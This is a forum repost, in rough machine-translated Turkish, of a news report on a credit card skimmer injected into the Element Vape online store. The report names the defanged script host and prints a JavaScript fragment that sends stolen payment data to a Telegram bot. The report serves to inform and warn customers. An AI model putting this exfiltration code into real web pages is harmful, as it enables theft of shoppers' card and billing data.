Kaydol

Merhaba Sevgili Floodlar.com Kullanıcısı, Web sitemizde geçirdiğiniz zaman ve bu büyüleyici flood evrenine katılımınız için teşekkür ederiz. Floodların geniş dünyasıyla dolu deneyiminizi daha fazla keşfetmek için, web sitemizi sınırsız olarak kullanabilmeniz adına giriş yapmanız gerekmektedir.

Oturum aç

Merhaba Floodlar.com Kullanıcısı, İlk üç sayfayı tamamladınız, tebrikler! Ancak, floodların devamını görmek ve daha fazla interaktif deneyim yaşamak için giriş yapmanız gerekiyor. Hesabınız yoksa, hızlıca oluşturabilirsiniz. Sınırsız floodlar ve etkileşimler sizleri bekliyor. Giriş yapmayı unutmayın!

Şifremi hatırlamıyorum

Şifreniz mi unuttunuz? Endişelenmeyin! Lütfen kayıtlı e-posta adresinizi giriniz. Size bir bağlantı göndereceğiz ve bu link üzerinden yeni bir şifre oluşturabileceksiniz.

Fil Necati Masonlar Locası Subreddit Adı Nedir? Cevap: ( N31 )

Üzgünüz, flood girme izniniz yok, Flood girmek için giriş yapmalısınız.

Lütfen bu Floodun neden bildirilmesi gerektiğini düşündüğünüzü kısaca açıklayın.

Lütfen bu cevabın neden bildirilmesi gerektiğini kısaca açıklayın.

Lütfen bu kullanıcının neden rapor edilmesi gerektiğini düşündüğünüzü kısaca açıklayın.

Mobil Uygulamada Açın

Güncel Floodlar En sonuncu Nesne

Büyük e-sigara mağazası kredi kartlarını çalmak için hacklendi

Büyük e-sigara mağazası kredi kartlarını çalmak için hacklendi

BleepingComputer, önde gelen çevrimiçi e-sigara ve vaping kitleri satıcısı Element Vape’in, muhtemelen saldırıya uğradıktan sonra canlı sitesinde bir kredi kartı skimmer hizmeti verdiğini doğruladı.

ABD ve Kanada’daki varlığı ile Element Vape, hem perakende satış noktalarında hem de çevrimiçi mağazalarında e-sigara, vaping cihazları, e-sıvılar ve CBD ürünleri satmaktadır.

Vaping sitesi, kredi kartlarını gözden geçirmek için JavaScript’i kullanıyor

Element Vape’in web sitesi, BleepingComputer tarafından görüldüğü gibi, kredi kartı hırsızı içeren bir üçüncü taraf web sitesinden kötü amaçlı bir JavaScript dosyası yüklüyor.

Komut dosyaları enjekte ederek bu tür kredi kartı hırsızlarını e-ticaret mağazalarında kullanan tehdit aktörleri olarak adlandırılır. Sihirbaz.

Ana sayfadan başlayarak mağazanın birden çok web sayfası, aşağıda gösterilen HTML kaynak kodunun 45-50 satırlarında görülebilen, belirsiz bir base64 kodlu komut dosyası içerir:

ElementVape.com tarafından yüklenen kötü amaçlı JS
ElementVape.com tarafından yüklenen kötü amaçlı JS (BipleyenBilgisayar)

Kötü amaçlı komut dosyasının ElementVape.com’da ne kadar süredir bulunduğu tam olarak bilinmiyor.

Wayback Machine üzerindeki ElementVape.com analizimiz, yukarıdaki kodun mevcut olmayan 5 Şubat 2022 ve öncesi itibariyle. Bu nedenle, enfeksiyon daha yeni gibi görünüyor, tarihten bir süre sonra ve bugün keşfedilmeden önce ortaya çıkıyor.

Kodu çözüldüğünde, bu altı satır, üçüncü taraf bir sitede barındırılan aşağıdaki JavaScript dosyasını çeker:


//weicowire[.]com/js/jquery/frontend.js

Ağır şekilde gizlenmiş kötü niyetli yük, bu ön uç.js sonuna doğru dosya:

Gizlenmiş JavaScript kodu
Üçüncü taraf sitede barındırılan gizlenmiş JavaScript kodu (BipleyenBilgisayar)

Komut dosyası, ödeme verilerini Telegram aracılığıyla sızdırıyor

Yukarıdaki komut dosyasının kodu çözüldüğünde ve BleepingComputer tarafından analiz edildiğinde, ödeme sırasında müşterilerin ödeme kartı ve fatura bilgilerini topladığı görüldü.

Komut dosyasının aradığı alanlardan bazıları şunlardır: e-posta adresi, ödeme kartı numarası/son kullanma tarihi, telefon numarası, sokak ve posta kodu dahil fatura adresi.

Bu bilgi daha sonra, komut dosyasında bulunan karmaşık, sabit kodlanmış bir Telegram adresi aracılığıyla saldırgana aktarılır:

 var x = new XMLHttpRequest();
    x.open("POST", "https://api.telegram.org/bot"+tbot+"/sendMessage", true);
    x.setRequestHeader('Content-Type', 'application/json; charset=utf-8');
    x.withCredentials = false;
var dd = JSON.stringify({ 
    chat_id: tchat,
    text: tmessage
 });
    x.send(dd);

Ayrıca, komut dosyası, korumalı alan ortamında mı yoksa “geliştiriciler“analizi caydırmak için.

Büyük ama belirsiz e-sigara perakendecisi

ElementVape.com’un arka uç kodunun, kötü amaçlı komut dosyasına gizlice girmek için ilk etapta nasıl değiştirildiği açık değil.

Ve bu, Element Vape’in ilk kez tehlikeye atılışı değil.

2018’de Element Vape müşterileri, şirketten bir veri ihlali meydana geldiğini ve “6 Aralık 2017 ile 27 Haziran 2018 arasındaki izinsiz giriş penceresinin” müşterilerin kişisel bilgilerini potansiyel olarak tehdit aktörlerine maruz bıraktığını belirten mektuplar aldıklarını bildirdi. Öğe Vape onaylanmış iddialar şirketin Reddit hesabı gibi görünüyor.

Bu olayın ardından, Illinois merkezli tüketici Artur Tyksinski dava açmak Element Vape, vaping perakendecisinin “veri ihlalinden etkilenen kişilere zamanında bildirimde bulunmadığını” ve müşterilerin gizli bilgilerine yetkisiz erişimi önlemek için yeterli prosedürlere sahip olmadığını iddia etti. Bunu bir sınıf eylemi izledi dava 2019’da jüri tarafından yargılanmasını talep etti.

sözde olmasına rağmen”dünyanın en büyük çevrimiçi Vape perakendecilerinden biriPerakende mağazalarında ve çevrimiçi olarak e-sigaraların sayısı, Element Vape hakkında çok fazla şey bilinmiyor.

olarak bilinir TheSY LLC Bazı eyaletlerde, Element Vape’in Twitter hesabı 13.000’den fazla kullanıcıyı takip ediyor.

Ancak, garip bir şekilde, tweet’leri korunuyor ve bu da perakendeci ile etkileşimi zorlaştırıyor.

korumalı tweetler
Element Vape’in tweetleri korunuyor (Twitter)

Web sitesine göre şirket, California’da bulunuyor ve 2013’ten beri faaliyet gösteriyor.

“Kişisel felsefemiz, tüketicilere ödediklerinden daha fazlasını vermektir. Beklentileri aşmak için tavizsiz bir dürtüyle, yardım etmeye kararlıyız. [sic] Müşteriler mümkün olan en iyi alışveriş deneyimini yaşıyor”, diyor Element Vape’in web sitesi.

Geçen yıl şirket, e-sigaralarını ve elektronik sigara ürünlerini Kanada’nın PUDOpoint Sayaçlarında “alınabilir” hale getirmek için PUDO (Alma veya Bırakma) Inc. ile ortaklık kurdu.

BleepingComputer, sorunu Element Vape’e bildirdi. Zendesk destek sitesianalizimiz sırasında kötü amaçlı komut dosyasını içermiyor gibi görünüyordu.

Kullanıcılar mağazada aktif olarak alışveriş yapıyor olabileceğinden, devam eden bu saldırıyla ilgili ayrıntıları paylaşmanın ve müşterilerin finansal bilgilerinin çalınmasını önlemenin kamu yararına olduğuna inanıyoruz.

Son zamanlarda web sitesinde herhangi bir satın alma işlemi yaptıysanız, kredi kartı işlemlerinizi şüpheli herhangi bir işlem için kontrol ettiğinizden emin olun.

İlgili Mesajlar

Yorum eklemek için giriş yapmalısınız.